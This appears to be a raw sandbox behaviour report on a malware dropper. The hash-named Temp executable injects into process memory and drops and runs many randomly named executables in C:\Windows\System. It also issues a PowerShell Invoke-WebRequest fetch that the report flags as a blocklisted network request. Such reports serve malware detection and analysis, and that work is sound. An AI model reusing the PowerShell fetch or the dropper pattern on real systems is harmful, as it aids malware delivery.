PID 2644 wrote to memory of 4492	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	astXCns.exe
PID 2644 wrote to memory of 4492	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	astXCns.exe
PID 2644 wrote to memory of 1476	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	xanDdLS.exe
PID 2644 wrote to memory of 1476	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	xanDdLS.exe
PID 2644 wrote to memory of 4348	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	EgcHqTM.exe
PID 2644 wrote to memory of 4348	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	EgcHqTM.exe
PID 2644 wrote to memory of 3524	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	WrhNQHX.exe
PID 2644 wrote to memory of 3524	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	WrhNQHX.exe
PID 2644 wrote to memory of 2140	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	pjgjBJI.exe
PID 2644 wrote to memory of 2140	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	pjgjBJI.exe
PID 2644 wrote to memory of 4048	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	dJGdDed.exe
PID 2644 wrote to memory of 4048	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	dJGdDed.exe
PID 2644 wrote to memory of 4836	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	sdCnYHo.exe
PID 2644 wrote to memory of 4836	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	sdCnYHo.exe
PID 2644 wrote to memory of 1028	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	bChLxer.exe
PID 2644 wrote to memory of 1028	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	bChLxer.exe
PID 2644 wrote to memory of 3400	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	cfaeeFt.exe
PID 2644 wrote to memory of 3400	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	cfaeeFt.exe
PID 2644 wrote to memory of 2096	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	otiFLuC.exe
PID 2644 wrote to memory of 2096	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	otiFLuC.exe
PID 2644 wrote to memory of 4848	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	OWBtRHR.exe
PID 2644 wrote to memory of 4848	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	OWBtRHR.exe
PID 2644 wrote to memory of 4652	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	vzJkLiL.exe
PID 2644 wrote to memory of 4652	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	vzJkLiL.exe
PID 2644 wrote to memory of 2076	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	kawCIla.exe
PID 2644 wrote to memory of 2076	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	kawCIla.exe
PID 2644 wrote to memory of 4820	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	Txstdsu.exe
PID 2644 wrote to memory of 4820	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	Txstdsu.exe
PID 2644 wrote to memory of 4352	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	yyPhrmd.exe
PID 2644 wrote to memory of 4352	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	yyPhrmd.exe
PID 2644 wrote to memory of 2164	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	dVYPUjx.exe
PID 2644 wrote to memory of 2164	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	dVYPUjx.exe
PID 2644 wrote to memory of 2524	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	LlmebEP.exe
PID 2644 wrote to memory of 2524	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	LlmebEP.exe
PID 2644 wrote to memory of 4732	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	XyKgSPP.exe
PID 2644 wrote to memory of 4732	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	XyKgSPP.exe
PID 2644 wrote to memory of 3000	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	rfhubhm.exe
PID 2644 wrote to memory of 3000	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	rfhubhm.exe

C:\Users\Admin\AppData\Local\Temp\b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
"C:\Users\Admin\AppData\Local\Temp\b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2176" "2944" "2880" "2948" "0" "0" "2952" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:13796
- C:\Windows\System\wHmEJWG.exe
  C:\Windows\System\wHmEJWG.exe
  2⤵
  - Executes dropped EXE
  PID:1120
- C:\Windows\System\SfPgjCB.exe
  C:\Windows\System\SfPgjCB.exe
  2⤵
  - Executes dropped EXE
  PID:1668
- C:\Windows\System\CAsbxoe.exe
  C:\Windows\System\CAsbxoe.exe
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\Windows\System\EJeLXro.exe
  C:\Windows\System\EJeLXro.exe
  2⤵
  - Executes dropped EXE
  PID:3476
- C:\Windows\System\yiSRTrm.exe
  C:\Windows\System\yiSRTrm.exe
  2⤵
  - Executes dropped EXE
  PID:2660
- C:\Windows\System\zMrMvmJ.exe
  C:\Windows\System\zMrMvmJ.exe
  2⤵
  - Executes dropped EXE
  PID:944
- C:\Windows\System\VDlaYNW.exe
  C:\Windows\System\VDlaYNW.exe
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Windows\System\IiAVSGl.exe
  C:\Windows\System\IiAVSGl.exe
  2⤵
  - Executes dropped EXE
  PID:340
- C:\Windows\System\ITSBtzM.exe
  C:\Windows\System\ITSBtzM.exe
  2⤵
  - Executes dropped EXE
  PID:3872
- C:\Windows\System\JwNvlxM.exe
  C:\Windows\System\JwNvlxM.exe
  2⤵
  - Executes dropped EXE
  PID:2424
- C:\Windows\System\obfDxaN.exe
  C:\Windows\System\obfDxaN.exe
  2⤵
  - Executes dropped EXE
  PID:3076
- C:\Windows\System\UHVeuYs.exe
  C:\Windows\System\UHVeuYs.exe
  2⤵
  - Executes dropped EXE
  PID:2912
- C:\Windows\System\astXCns.exe
  C:\Windows\System\astXCns.exe
  2⤵
  - Executes dropped EXE
  PID:4492
- C:\Windows\System\xanDdLS.exe
  C:\Windows\System\xanDdLS.exe
  2⤵
  - Executes dropped EXE
  PID:1476
- C:\Windows\System\EgcHqTM.exe
  C:\Windows\System\EgcHqTM.exe
  2⤵
  - Executes dropped EXE
  PID:4348
- C:\Windows\System\WrhNQHX.exe
  C:\Windows\System\WrhNQHX.exe
  2⤵
  - Executes dropped EXE
  PID:3524
- C:\Windows\System\pjgjBJI.exe
  C:\Windows\System\pjgjBJI.exe
  2⤵
  - Executes dropped EXE
  PID:2140
- C:\Windows\System\dJGdDed.exe
  C:\Windows\System\dJGdDed.exe
  2⤵
  - Executes dropped EXE
  PID:4048
- C:\Windows\System\sdCnYHo.exe
  C:\Windows\System\sdCnYHo.exe
  2⤵
  - Executes dropped EXE
  PID:4836
- C:\Windows\System\bChLxer.exe
  C:\Windows\System\bChLxer.exe
  2⤵
  - Executes dropped EXE
  PID:1028
- C:\Windows\System\cfaeeFt.exe
  C:\Windows\System\cfaeeFt.exe
  2⤵
  - Executes dropped EXE
  PID:3400
- C:\Windows\System\otiFLuC.exe
  C:\Windows\System\otiFLuC.exe
  2⤵
  - Executes dropped EXE
  PID:2096
- C:\Windows\System\OWBtRHR.exe
  C:\Windows\System\OWBtRHR.exe
  2⤵
  - Executes dropped EXE
  PID:4848
- C:\Windows\System\vzJkLiL.exe
  C:\Windows\System\vzJkLiL.exe
  2⤵
  - Executes dropped EXE
  PID:4652
- C:\Windows\System\kawCIla.exe
  C:\Windows\System\kawCIla.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Windows\System\Txstdsu.exe
  C:\Windows\System\Txstdsu.exe
  2⤵
  - Executes dropped EXE
  PID:4820
- C:\Windows\System\yyPhrmd.exe
  C:\Windows\System\yyPhrmd.exe
  2⤵
  - Executes dropped EXE
  PID:4352
- C:\Windows\System\dVYPUjx.exe
  C:\Windows\System\dVYPUjx.exe
  2⤵
  - Executes dropped EXE
  PID:2164
- C:\Windows\System\LlmebEP.exe
  C:\Windows\System\LlmebEP.exe
  2⤵
  - Executes dropped EXE
  PID:2524
- C:\Windows\System\XyKgSPP.exe
  C:\Windows\System\XyKgSPP.exe
  2⤵
  - Executes dropped EXE
  PID:4732
- C:\Windows\System\rfhubhm.exe
  C:\Windows\System\rfhubhm.exe
  2⤵
  - Executes dropped EXE
  PID:3000
- C:\Windows\System\izkJDOC.exe
  C:\Windows\System\izkJDOC.exe
  2⤵
  - Executes dropped EXE
  PID:388
- C:\Windows\System\cRCEJVd.exe
  C:\Windows\System\cRCEJVd.exe
  2⤵
  - Executes dropped EXE
  PID:396
- C:\Windows\System\hAgbjiB.exe
  C:\Windows\System\hAgbjiB.exe
  2⤵
  - Executes dropped EXE
  PID:4740
- C:\Windows\System\ZRtTNMt.exe
  C:\Windows\System\ZRtTNMt.exe
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Windows\System\iRyrlBv.exe
  C:\Windows\System\iRyrlBv.exe
  2⤵
  - Executes dropped EXE
  PID:3492
- C:\Windows\System\uGfaAgh.exe
  C:\Windows\System\uGfaAgh.exe
  2⤵
  - Executes dropped EXE
  PID:5108
- C:\Windows\System\uCQGqtp.exe
  C:\Windows\System\uCQGqtp.exe
  2⤵
  - Executes dropped EXE
  PID:2224
- C:\Windows\System\bjZHtOs.exe
  C:\Windows\System\bjZHtOs.exe
  2⤵
  - Executes dropped EXE
  PID:3428
- C:\Windows\System\yyNXXcc.exe
  C:\Windows\System\yyNXXcc.exe
  2⤵
  - Executes dropped EXE
  PID:4484
- C:\Windows\System\KuTVEqB.exe
  C:\Windows\System\KuTVEqB.exe
  2⤵
  - Executes dropped EXE
  PID:2640
- C:\Windows\System\iZwYhjB.exe
  C:\Windows\System\iZwYhjB.exe
  2⤵
  - Executes dropped EXE
  PID:4744
- C:\Windows\System\pcYHNsL.exe
  C:\Windows\System\pcYHNsL.exe
  2⤵
  - Executes dropped EXE
  PID:3192
- C:\Windows\System\gFtSiMv.exe
  C:\Windows\System\gFtSiMv.exe
  2⤵
  - Executes dropped EXE
  PID:4280
- C:\Windows\System\NkitgqS.exe
  C:\Windows\System\NkitgqS.exe
  2⤵
  - Executes dropped EXE
  PID:1872
- C:\Windows\System\DpSxgTN.exe
  C:\Windows\System\DpSxgTN.exe
  2⤵
  - Executes dropped EXE
  PID:2208
- C:\Windows\System\WYrGVCv.exe
  C:\Windows\System\WYrGVCv.exe
  2⤵
  - Executes dropped EXE
  PID:2612
- C:\Windows\System\gdrcmhC.exe
  C:\Windows\System\gdrcmhC.exe
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\Windows\System\qjuTMZz.exe
  C:\Windows\System\qjuTMZz.exe
  2⤵
  - Executes dropped EXE
  PID:1232
- C:\Windows\System\bTsJVyv.exe
  C:\Windows\System\bTsJVyv.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\uXLxHse.exe
  C:\Windows\System\uXLxHse.exe
  2⤵
  - Executes dropped EXE
  PID:2656
- C:\Windows\System\EdgEeaq.exe
  C:\Windows\System\EdgEeaq.exe
  2⤵
  - Executes dropped EXE
  PID:4856
- C:\Windows\System\YAsKfXg.exe
  C:\Windows\System\YAsKfXg.exe
  2⤵
  - Executes dropped EXE
  PID:3252
- C:\Windows\System\xJQWVDR.exe
  C:\Windows\System\xJQWVDR.exe
  2⤵
  - Executes dropped EXE
  PID:1456
- C:\Windows\System\oZBdgWS.exe
  C:\Windows\System\oZBdgWS.exe
  2⤵
  - Executes dropped EXE
  PID:4268
- C:\Windows\System\YcyGWJj.exe
  C:\Windows\System\YcyGWJj.exe
  2⤵
  - Executes dropped EXE
  PID:2880
- C:\Windows\System\wizQScM.exe
  C:\Windows\System\wizQScM.exe
  2⤵
  - Executes dropped EXE
  PID:4568
- C:\Windows\System\USUssdJ.exe
  C:\Windows\System\USUssdJ.exe
  2⤵
  - Executes dropped EXE
  PID:316
- C:\Windows\System\WInAuUi.exe
  C:\Windows\System\WInAuUi.exe
  2⤵
  - Executes dropped EXE
  PID:2968
- C:\Windows\System\swVRqiw.exe
  C:\Windows\System\swVRqiw.exe
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\System\wKPRvHD.exe
  C:\Windows\System\wKPRvHD.exe
  2⤵
  - Executes dropped EXE
  PID:1020
- C:\Windows\System\mPRWWgt.exe
  C:\Windows\System\mPRWWgt.exe
  2⤵
  - Executes dropped EXE
  PID:8
- C:\Windows\System\rsixrhY.exe
  C:\Windows\System\rsixrhY.exe
  2⤵
  - Executes dropped EXE
  PID:1608
- C:\Windows\System\jSMgFsJ.exe
  C:\Windows\System\jSMgFsJ.exe
  2⤵
  - Executes dropped EXE
  PID:4552
- C:\Windows\System\odzovTd.exe
  C:\Windows\System\odzovTd.exe
  2⤵
  PID:372
- C:\Windows\System\lsfokUV.exe
  C:\Windows\System\lsfokUV.exe
  2⤵
  PID:4728
- C:\Windows\System\KlFhyOF.exe
  C:\Windows\System\KlFhyOF.exe
  2⤵
  PID:2448
- C:\Windows\System\aOrvxnG.exe
  C:\Windows\System\aOrvxnG.exe
  2⤵
  PID:4424
- C:\Windows\System\DwvzOHt.exe
  C:\Windows\System\DwvzOHt.exe
  2⤵
  PID:5116
- C:\Windows\System\hKZDjlJ.exe
  C:\Windows\System\hKZDjlJ.exe
  2⤵
  PID:5124
- C:\Windows\System\pIoGwNL.exe
  C:\Windows\System\pIoGwNL.exe
  2⤵
  PID:5156
- C:\Windows\System\wwpezWF.exe
  C:\Windows\System\wwpezWF.exe
  2⤵
  PID:5188
- C:\Windows\System\mcSzhbQ.exe
  C:\Windows\System\mcSzhbQ.exe
  2⤵
  PID:5216
- C:\Windows\System\GDizgMc.exe
  C:\Windows\System\GDizgMc.exe
  2⤵
  PID:5248
- C:\Windows\System\DlbUOQV.exe
  C:\Windows\System\DlbUOQV.exe
  2⤵
  PID:5276
- C:\Windows\System\pPbYzem.exe
  C:\Windows\System\pPbYzem.exe
  2⤵
  PID:5296
- C:\Windows\System\BbwqEji.exe
  C:\Windows\System\BbwqEji.exe
  2⤵
  PID:5332
- C:\Windows\System\AZDjynK.exe
  C:\Windows\System\AZDjynK.exe
  2⤵
  PID:5360
- C:\Windows\System\jGITeLh.exe
  C:\Windows\System\jGITeLh.exe
  2⤵
  PID:5380
- C:\Windows\System\ggvqOby.exe
  C:\Windows\System\ggvqOby.exe
  2⤵
  PID:5420
- C:\Windows\System\DLTEmXE.exe
  C:\Windows\System\DLTEmXE.exe
  2⤵
  PID:5460
- C:\Windows\System\XvMhbPT.exe
  C:\Windows\System\XvMhbPT.exe
  2⤵
  PID:5476
- C:\Windows\System\gQySyZL.exe
  C:\Windows\System\gQySyZL.exe
  2⤵
  PID:5536
- C:\Windows\System\FrFWftk.exe
  C:\Windows\System\FrFWftk.exe
  2⤵
  PID:5596
- C:\Windows\System\bVIRTrs.exe
  C:\Windows\System\bVIRTrs.exe
  2⤵
  PID:5612
- C:\Windows\System\AANwmWb.exe
  C:\Windows\System\AANwmWb.exe
  2⤵
  PID:5628
- C:\Windows\System\wWSedGh.exe
  C:\Windows\System\wWSedGh.exe
  2⤵
  PID:5656
- C:\Windows\System\fNojrGB.exe
  C:\Windows\System\fNojrGB.exe
  2⤵
  PID:5684
- C:\Windows\System\UunZwiR.exe
  C:\Windows\System\UunZwiR.exe
  2⤵
  PID:5712
- C:\Windows\System\UpYpULs.exe
  C:\Windows\System\UpYpULs.exe
  2⤵
  PID:5740
- C:\Windows\System\pKpmckA.exe
  C:\Windows\System\pKpmckA.exe
  2⤵
  PID:5764
- C:\Windows\System\JJgDEuZ.exe
  C:\Windows\System\JJgDEuZ.exe
  2⤵
  PID:5812
- C:\Windows\System\JpqUPTf.exe
  C:\Windows\System\JpqUPTf.exe
  2⤵
  PID:5840
- C:\Windows\System\tRECTti.exe
  C:\Windows\System\tRECTti.exe
  2⤵
  PID:5860
- C:\Windows\System\NPjWdGA.exe
  C:\Windows\System\NPjWdGA.exe
  2⤵
  PID:5880
- C:\Windows\System\pMvksXv.exe
  C:\Windows\System\pMvksXv.exe
  2⤵
  PID:5924
- C:\Windows\System\teIvPmx.exe
  C:\Windows\System\teIvPmx.exe
  2⤵
  PID:5940
- C:\Windows\System\TYtvrgf.exe
  C:\Windows\System\TYtvrgf.exe
  2⤵
  PID:5960
- C:\Windows\System\YVvdGaa.exe
  C:\Windows\System\YVvdGaa.exe
  2⤵
  PID:5988
- C:\Windows\System\aZwzRMG.exe
  C:\Windows\System\aZwzRMG.exe
  2⤵
  PID:6024
- C:\Windows\System\ohXdtDQ.exe
  C:\Windows\System\ohXdtDQ.exe
  2⤵
  PID:6060
- C:\Windows\System\uCGgdUt.exe
  C:\Windows\System\uCGgdUt.exe
  2⤵
  PID:6084
- C:\Windows\System\epuXSMF.exe
  C:\Windows\System\epuXSMF.exe
  2⤵
  PID:6128
- C:\Windows\System\SnnMIli.exe
  C:\Windows\System\SnnMIli.exe
  2⤵
  PID:428
- C:\Windows\System\XsvBFzp.exe
  C:\Windows\System\XsvBFzp.exe
  2⤵
  PID:5080
- C:\Windows\System\hpNJiMt.exe
  C:\Windows\System\hpNJiMt.exe
  2⤵
  PID:1188
- C:\Windows\System\RAHyYRM.exe
  C:\Windows\System\RAHyYRM.exe
  2⤵
  PID:2220
- C:\Windows\System\ltlIzHs.exe
  C:\Windows\System\ltlIzHs.exe
  2⤵
  PID:2468
- C:\Windows\System\HmbIaSn.exe
  C:\Windows\System\HmbIaSn.exe
  2⤵
  PID:1840
- C:\Windows\System\OQIumZJ.exe
  C:\Windows\System\OQIumZJ.exe
  2⤵
  PID:2112
- C:\Windows\System\rUghzyJ.exe
  C:\Windows\System\rUghzyJ.exe
  2⤵
  PID:2328
- C:\Windows\System\zMELifN.exe
  C:\Windows\System\zMELifN.exe
  2⤵
  PID:1324
- C:\Windows\System\qSJTsTM.exe
  C:\Windows\System\qSJTsTM.exe
  2⤵
  PID:5348
- C:\Windows\System\swGQcsD.exe
  C:\Windows\System\swGQcsD.exe
  2⤵
  PID:5412
- C:\Windows\System\RugsQfj.exe
  C:\Windows\System\RugsQfj.exe
  2⤵
  PID:5448
- C:\Windows\System\QlhBPZh.exe
  C:\Windows\System\QlhBPZh.exe
  2⤵
  PID:5620
- C:\Windows\System\UztEpLb.exe
  C:\Windows\System\UztEpLb.exe
  2⤵
  PID:5576
- C:\Windows\System\mPPIWPk.exe
  C:\Windows\System\mPPIWPk.exe
  2⤵
  PID:5676
- C:\Windows\System\Dqsfkal.exe
  C:\Windows\System\Dqsfkal.exe
  2⤵
  PID:4620
- C:\Windows\System\KKmedBo.exe
  C:\Windows\System\KKmedBo.exe
  2⤵
  PID:4656
- C:\Windows\System\sCNZLPu.exe
  C:\Windows\System\sCNZLPu.exe
  2⤵
  PID:4680
- C:\Windows\System\ecrKRzc.exe
  C:\Windows\System\ecrKRzc.exe
  2⤵
  PID:5752
- C:\Windows\System\qOVvoxh.exe
  C:\Windows\System\qOVvoxh.exe
  2⤵
  PID:5756
- C:\Windows\System\srENTTn.exe
  C:\Windows\System\srENTTn.exe
  2⤵
  PID:5788
- C:\Windows\System\dJNfbPr.exe
  C:\Windows\System\dJNfbPr.exe
  2⤵
  PID:5876
- C:\Windows\System\HDtBXQj.exe
  C:\Windows\System\HDtBXQj.exe
  2⤵
  PID:5852
- C:\Windows\System\zXoMBic.exe
  C:\Windows\System\zXoMBic.exe
  2⤵
  PID:4748
- C:\Windows\System\UlSNsUJ.exe
  C:\Windows\System\UlSNsUJ.exe
  2⤵
  PID:5936
- C:\Windows\System\DolKzgy.exe
  C:\Windows\System\DolKzgy.exe
  2⤵
  PID:6108
- C:\Windows\System\roFsAby.exe
  C:\Windows\System\roFsAby.exe
  2⤵
  PID:5060
- C:\Windows\System\nIxDjwg.exe
  C:\Windows\System\nIxDjwg.exe
  2⤵
  PID:1064
- C:\Windows\System\XtxFIJv.exe
  C:\Windows\System\XtxFIJv.exe
  2⤵
  PID:808
- C:\Windows\System\ixLsAsr.exe
  C:\Windows\System\ixLsAsr.exe
  2⤵
  PID:4544
- C:\Windows\System\zoPclrb.exe
  C:\Windows\System\zoPclrb.exe
  2⤵
  PID:3480
- C:\Windows\System\cmMTtJq.exe
  C:\Windows\System\cmMTtJq.exe
  2⤵
  PID:3328
- C:\Windows\System\DQcywEu.exe
  C:\Windows\System\DQcywEu.exe
  2⤵
  PID:4892
- C:\Windows\System\ndIPLNr.exe
  C:\Windows\System\ndIPLNr.exe
  2⤵
  PID:2364
- C:\Windows\System\iFOzikA.exe
  C:\Windows\System\iFOzikA.exe
  2⤵
  PID:3712
- C:\Windows\System\AiaZbry.exe
  C:\Windows\System\AiaZbry.exe
  2⤵
  PID:2116
- C:\Windows\System\uwuwxCx.exe
  C:\Windows\System\uwuwxCx.exe
  2⤵
  PID:2936
- C:\Windows\System\mYSdREC.exe
  C:\Windows\System\mYSdREC.exe
  2⤵
  PID:5260
- C:\Windows\System\myfFQLd.exe
  C:\Windows\System\myfFQLd.exe
  2⤵
  PID:5368
- C:\Windows\System\GOVQcLs.exe
  C:\Windows\System\GOVQcLs.exe
  2⤵
  PID:2340
- C:\Windows\System\EYQPVbP.exe
  C:\Windows\System\EYQPVbP.exe
  2⤵
  PID:5504
- C:\Windows\System\UcOPxxP.exe
  C:\Windows\System\UcOPxxP.exe
  2⤵
  PID:2228
- C:\Windows\System\PHckWVe.exe
  C:\Windows\System\PHckWVe.exe
  2⤵
  PID:1924
- C:\Windows\System\eWFtDdL.exe
  C:\Windows\System\eWFtDdL.exe
  2⤵
  PID:3660
- C:\Windows\System\GaWGSOJ.exe
  C:\Windows\System\GaWGSOJ.exe
  2⤵
  PID:5956
- C:\Windows\System\juQNnLB.exe
  C:\Windows\System\juQNnLB.exe
  2⤵
  PID:4520
- C:\Windows\System\kBMyyFP.exe
  C:\Windows\System\kBMyyFP.exe
  2⤵
  PID:6056
- C:\Windows\System\fwIZybD.exe
  C:\Windows\System\fwIZybD.exe
  2⤵
  PID:4340
- C:\Windows\System\TTVOiPw.exe
  C:\Windows\System\TTVOiPw.exe
  2⤵
  PID:1596
- C:\Windows\System\gXyzGSa.exe
  C:\Windows\System\gXyzGSa.exe
  2⤵
  PID:1276
- C:\Windows\System\PFrkCwo.exe
  C:\Windows\System\PFrkCwo.exe
  2⤵
  PID:5204
- C:\Windows\System\tRDrMcA.exe
  C:\Windows\System\tRDrMcA.exe
  2⤵
  PID:5800
- C:\Windows\System\ZhFYNtD.exe
  C:\Windows\System\ZhFYNtD.exe
  2⤵
  PID:3584
- C:\Windows\System\gfyObnh.exe
  C:\Windows\System\gfyObnh.exe
  2⤵
  PID:2316
- C:\Windows\System\mBmWlez.exe
  C:\Windows\System\mBmWlez.exe
  2⤵
  PID:1148
- C:\Windows\System\CpZNRnV.exe
  C:\Windows\System\CpZNRnV.exe
  2⤵
  PID:4100
- C:\Windows\System\OMpPwig.exe
  C:\Windows\System\OMpPwig.exe
  2⤵
  PID:5824
- C:\Windows\System\uPXhqeb.exe
  C:\Windows\System\uPXhqeb.exe
  2⤵
  PID:3680
- C:\Windows\System\XzJQLEu.exe
  C:\Windows\System\XzJQLEu.exe
  2⤵
  PID:5588
- C:\Windows\System\wMAniBQ.exe
  C:\Windows\System\wMAniBQ.exe
  2⤵
  PID:968
- C:\Windows\System\SKOYrDQ.exe
  C:\Windows\System\SKOYrDQ.exe
  2⤵
  PID:6180
- C:\Windows\System\vImYRDf.exe
  C:\Windows\System\vImYRDf.exe
  2⤵
  PID:6204
- C:\Windows\System\JnoYGad.exe
  C:\Windows\System\JnoYGad.exe
  2⤵
  PID:6224
- C:\Windows\System\GYQipxA.exe
  C:\Windows\System\GYQipxA.exe
  2⤵
  PID:6268
- C:\Windows\System\DnwcIPB.exe
  C:\Windows\System\DnwcIPB.exe
  2⤵
  PID:6300
- C:\Windows\System\QWyGEIT.exe
  C:\Windows\System\QWyGEIT.exe
  2⤵
  PID:6316
- C:\Windows\System\lFMvuLZ.exe
  C:\Windows\System\lFMvuLZ.exe
  2⤵
  PID:6340
- C:\Windows\System\THRECDF.exe
  C:\Windows\System\THRECDF.exe
  2⤵
  PID:6384
- C:\Windows\System\qWOhndT.exe
  C:\Windows\System\qWOhndT.exe
  2⤵
  PID:6416
- C:\Windows\System\DjKUHYd.exe
  C:\Windows\System\DjKUHYd.exe
  2⤵
  PID:6444
- C:\Windows\System\kxHxVWn.exe
  C:\Windows\System\kxHxVWn.exe
  2⤵
  PID:6464
- C:\Windows\System\gexuciy.exe
  C:\Windows\System\gexuciy.exe
  2⤵
  PID:6480
- C:\Windows\System\vmseqSq.exe
  C:\Windows\System\vmseqSq.exe
  2⤵
  PID:6496
- C:\Windows\System\pplQtgx.exe
  C:\Windows\System\pplQtgx.exe
  2⤵
  PID:6516
- C:\Windows\System\SMAEXrg.exe
  C:\Windows\System\SMAEXrg.exe
  2⤵
  PID:6540
- C:\Windows\System\GgdTGPd.exe
  C:\Windows\System\GgdTGPd.exe
  2⤵
  PID:6584
- C:\Windows\System\zjOdRGT.exe
  C:\Windows\System\zjOdRGT.exe
  2⤵
  PID:6608
- C:\Windows\System\kVBBHGA.exe
  C:\Windows\System\kVBBHGA.exe
  2⤵
  PID:6648
- C:\Windows\System\MSrFNxF.exe
  C:\Windows\System\MSrFNxF.exe
  2⤵
  PID:6668
- C:\Windows\System\pQcoGRn.exe
  C:\Windows\System\pQcoGRn.exe
  2⤵
  PID:6692
- C:\Windows\System\aDJBNvN.exe
  C:\Windows\System\aDJBNvN.exe
  2⤵
  PID:6712
- C:\Windows\System\AXngJNC.exe
  C:\Windows\System\AXngJNC.exe
  2⤵
  PID:6736
- C:\Windows\System\pZRkVSE.exe
  C:\Windows\System\pZRkVSE.exe
  2⤵
  PID:6764
- C:\Windows\System\TeyGiPN.exe
  C:\Windows\System\TeyGiPN.exe
  2⤵
  PID:6784
- C:\Windows\System\LcnHiPh.exe
  C:\Windows\System\LcnHiPh.exe
  2⤵
  PID:6812
- C:\Windows\System\HrqVHsm.exe
  C:\Windows\System\HrqVHsm.exe
  2⤵
  PID:6840
- C:\Windows\System\JrSGOrI.exe
  C:\Windows\System\JrSGOrI.exe
  2⤵
  PID:6924
- C:\Windows\System\hPSVDqa.exe
  C:\Windows\System\hPSVDqa.exe
  2⤵
  PID:6948
- C:\Windows\System\ayvKmNb.exe
  C:\Windows\System\ayvKmNb.exe
  2⤵
  PID:6972
- C:\Windows\System\iQgKhzS.exe
  C:\Windows\System\iQgKhzS.exe
  2⤵
  PID:6992
- C:\Windows\System\mfutsPH.exe
  C:\Windows\System\mfutsPH.exe
  2⤵
  PID:7016
- C:\Windows\System\efrlXDM.exe
  C:\Windows\System\efrlXDM.exe
  2⤵
  PID:7060
- C:\Windows\System\VwPKIku.exe
  C:\Windows\System\VwPKIku.exe
  2⤵
  PID:7080
- C:\Windows\System\CpBqumf.exe
